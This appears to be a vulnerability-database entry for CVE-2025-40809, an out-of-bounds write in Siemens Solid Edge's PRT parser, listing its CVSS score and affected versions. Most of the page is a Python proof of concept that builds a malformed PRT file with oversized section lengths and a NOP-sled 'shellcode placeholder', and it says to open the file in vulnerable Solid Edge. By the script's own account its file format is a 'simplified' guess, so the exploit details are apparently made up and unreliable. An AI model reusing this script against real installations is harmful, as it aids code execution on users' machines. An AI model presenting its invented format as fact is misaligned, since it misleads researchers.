Security Vulnerability Report
CVE-2025-40809 CVSS 7.8 HIGH

CVE-2025-40809

Published: 2025-10-14 10:15:40
Last Modified: 2025-10-16 14:03:18

Description

A vulnerability has been identified in Solid Edge SE2024 (All versions < V224.0 Update 14), Solid Edge SE2025 (All versions < V225.0 Update 6). The affected applications contain an out-of-bounds write vulnerability while parsing specially crafted PRT files. This could allow an attacker to crash the application or execute code in the context of the current process.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:siemens:solid_edge_se2024:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:siemens:solid_edge_se2024:224.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0001:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00010:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00011:*:*:*:*:*:* - VULNERABLE
Solid Edge SE2024 < V224.0 Update 14
Solid Edge SE2025 < V225.0 Update 6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-40809 PoC - Solid Edge PRT File Out-of-Bounds Write
# This PoC demonstrates a malformed PRT file that triggers an out-of-bounds write
# vulnerability in Solid Edge SE2024 (< V224.0 Update 14) and SE2025 (< V225.0 Update 6)
#
# WARNING: This is for educational/research purposes only. Do not use maliciously.

import struct
import sys


def generate_malicious_prt(filename):
    """
    Generate a malicious PRT file that triggers out-of-bounds write
    during Solid Edge's PRT file parsing.
    """
    # PRT file header (simplified Solid Edge PRT format)
    header = b'\x00' * 16  # File header magic bytes

    # Section 1: File metadata with corrupted length field
    # Normal section header: 4-byte tag + 4-byte length
    section1_tag = b'META'
    # Intentionally oversized length value to trigger OOB write
    section1_length = struct.pack('<I', 0xFFFFFF00)  # Overly large length
    section1_data = b'\x41' * 64  # Section data payload

    # Section 2: Geometry data with malformed offset
    section2_tag = b'GEOM'
    section2_length = struct.pack('<I', 128)
    # Corrupted vertex/normal data with out-of-bounds indices
    section2_data = struct.pack('<III', 0xDEADBEEF, 0x41414141, 0xCAFEBABE)
    section2_data += b'\x90' * 112  # NOP sled-like pattern (shellcode placeholder)

    # Section 3: Property block with buffer overflow trigger
    section3_tag = b'PROP'
    section3_length = struct.pack('<I', 32)
    # Crafted property values that exceed expected buffer
    section3_data = b'\x42' * 256  # Exceeds declared length to trigger OOB write

    # Assemble malicious PRT file
    payload = header
    payload += section1_tag + section1_length + section1_data
    payload += section2_tag + section2_length + section2_data
    payload += section3_tag + section3_length + section3_data
    # Add trailer
    payload += b'\x00' * 32

    with open(filename, 'wb') as f:
        f.write(payload)

    print(f"[+] Malicious PRT file generated: {filename}")
    print(f"[+] File size: {len(payload)} bytes")
    print(f"[!] Open this file with vulnerable Solid Edge to trigger CVE-2025-40809")


if __name__ == '__main__':
    output_file = sys.argv[1] if len(sys.argv) > 1 else 'exploit.prt'
    generate_malicious_prt(output_file)

# Usage:
#   python3 poc.py malicious.prt
#   Then open malicious.prt in vulnerable Solid Edge SE2024/SE2025

Raw JSON Data
